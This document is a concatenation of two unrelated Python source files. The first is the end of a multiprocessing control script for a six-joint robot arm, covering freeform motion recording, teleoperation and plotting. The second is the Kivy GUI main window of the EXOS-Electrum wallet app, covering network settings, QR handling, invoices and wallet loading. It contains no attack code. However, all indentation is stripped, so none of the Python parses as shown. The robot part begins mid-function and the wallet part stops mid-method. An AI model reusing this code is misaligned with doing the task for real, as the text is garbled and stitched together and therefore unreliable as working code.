gt.GOTO_position_HOLD(y+1,rbt.RAD2E(freeform_record_array[0][y],y),30,5.5,1)
#print("firstGOTO i sleep 3s")
time.sleep(3)
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(freeform_record_array[current_freefrom_step_execute][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
#print(current_freefrom_step_execute)
if(current_freefrom_step_execute == freeform_record_len - 1):
current_freefrom_step_execute = 0
software_control[5] = 0
#print("done")
if(software_control[5] == 1):
current_freefrom_step_execute = current_freefrom_step_execute + 1
# Ako je current_freefrom_step_execute == freeform_record_len
# software_control[5] = 0
# current_freefrom_step_execute = 0
# If we want to show plot
if(software_control[6] == 1):
#print(freeform_record_len)
software_control[6] = 0
plt.plot(freeform_record_array)
plt.show()
# Clear all recorded
if(software_control[7] == 1):
software_control[7] = 0
freeform_record_array = np.empty(shape=(15000,6),order='C',dtype='object')
# variable that tells us how many steps we took in our freeform recording
freeform_record_len = 0
current_freefrom_step = 0
tt = tt + 1
if(tt == 10):
print((time.time() - bg))
tt = 0
####################################
except:
gt.try_reconnect()
def show_graph(p1, p2, p3, p4, p5, p6):
while(1):
#print(p5.value)
#print(p6.value)
if p6.value == 0:
plots.runGraph(p1,p2,p3,p4,p5.value,p6.value)
p6.value = 1
if __name__ == "__main__":
Setpoint_Speed_Proc = multiprocessing.Value('d',0) # return value of speed setpoint
Setpoint_Acc_Proc = multiprocessing.Value('d',0) # return value of acceleration setpoint
# return value of what translation button is pressed
# Variables go like this X+,X-,Y+,Y-,Z+,Z-
Translations_Proc = multiprocessing.Array("i",6, lock=False)
# Variables go from top top bottom and 1 represents pressed and 0 released
Left_btns_Proc = multiprocessing.Array("i",6, lock=False) # return value of what left button is pressed
Right_btns_Proc = multiprocessing.Array("i",6, lock=False) # return value of what right button is pressed
software_control_variables = multiprocessing.Array("i",8, lock=False) # variables are index values:
#Index 0: Enable/Disable robot. Disable places it in position hold mode, Enable allows to use other functions(jog, teach...)
# 0 is for disabled / 1 is for enabled
#Index 1: What window is open: 0 - Move, 1 - log, 2 - Teach, 3 - setup
#Index 2: variable to set motor modes in teach mode/position hold
#Index 3: Execute flag. If 1 we are executing script if 0 we are not
#Index 4: Recording freeform movement 1 is for recording 0 for not recordning
#Index 5: 1 is for executing freeform movement 0 is for not executing freeform
#Index 6: Show plot 1 is to trigger show
#Index 7: Clear all recorded
grav_pos_flag = multiprocessing.Array("i",[1,1,1,1,1,1,1], lock=False) # Used to log what joints should be in gravity compensation and what should be in position hold.
# Index 6 (7nth variable) is used to tell us if we are in gravity comp(1) or disable motor(0)
# These are variables we get packed in one string from master serial port
# Len is the number of joints available
p_position = multiprocessing.Array("i", rbt.Joint_num, lock=False) # Raw encoder ticks
p_position_RADS = multiprocessing.Array("d", rbt.Joint_num, lock=False) # True radians position for kinematic model
# this includes all offsets and conversions so the robot matches his kinematic model
p_speed = multiprocessing.Array("i", rbt.Joint_num, lock=False) # Raw Speed in RPM
p_speed_RADS = multiprocessing.Array("d", rbt.Joint_num, lock=False) # True speed in RAD/S
p_current = multiprocessing.Array("i", rbt.Joint_num, lock=False)
p_temperature = multiprocessing.Array("i", rbt.Joint_num, lock=False)
p_voltage = multiprocessing.Value('i',0)
p_error = multiprocessing.Value('i',0)
proc_value_show_plot = multiprocessing.Value('i',2)
proc_value_close_plot = multiprocessing.Value('i',0)
p_robot_pose = multiprocessing.Array("d", 6, lock=False) # Current pose of the robot
# Variables for Steer mode
Steer_K1 = multiprocessing.Array("d", rbt.Joint_num, lock=False)
Steer_K2 = multiprocessing.Array("d", rbt.Joint_num, lock=False)
Steer_K3 = multiprocessing.Array("d", rbt.Joint_num, lock=False)
Steer_K4 = multiprocessing.Array("d", rbt.Joint_num, lock=False)
process1 = multiprocessing.Process(target=Tkinter_GUI,args=[Setpoint_Speed_Proc,Setpoint_Acc_Proc,Translations_Proc,Left_btns_Proc,
Right_btns_Proc,p_position,p_position_RADS,p_current,p_temperature,
p_robot_pose,grav_pos_flag,software_control_variables,
Steer_K1,Steer_K2,Steer_K3,Steer_K4])
process2 = multiprocessing.Process(target=do_stuff,args=[Left_btns_Proc,Right_btns_Proc,p_position,p_position_RADS,Setpoint_Speed_Proc,
Setpoint_Acc_Proc,p_current,p_temperature,p_robot_pose,p_speed,p_speed_RADS,
grav_pos_flag,software_control_variables,Steer_K1,Steer_K2,Steer_K3,Steer_K4])
#proc_position, proc_speed, proc_current, proc_temperature, proc_plot_show, close_event
process3 = multiprocessing.Process(target=show_graph,args=[p_position_RADS,p_speed_RADS,p_current,p_temperature,proc_value_show_plot,proc_value_close_plot])
process1.start()
process2.start()
process3.start()
process1.join()
process2.join()
process3.join()
process1.terminate()
process2.terminate()
process3.terminate()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from electrum_exos.bitcoin import TYPE_ADDRESS
from electrum_exos.storage import WalletStorage
from electrum_exos.wallet import Wallet, InternalAddressCorruption
from electrum_exos.paymentrequest import InvoiceStore
from electrum_exos.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum_exos.plugin import run_hook
from electrum_exos.util import format_satoshis, format_satoshis_plain, format_fee_satoshis
from electrum_exos.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum_exos import blockchain
from electrum_exos.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_exos.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_exos.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_exos.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_exos.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_exos.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_exos.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_exos import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'exos':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
title = _('EXOS-Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_exos.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('exos:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_exos.transaction import Transaction
from electrum_exos.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_exos.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_exos.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for exos: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of exos-electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_exos.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_exos.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/exos-electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_exos.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' exo/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('EXOS-Electrum', message,
app_icon=icon, app_name='EXOS-Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
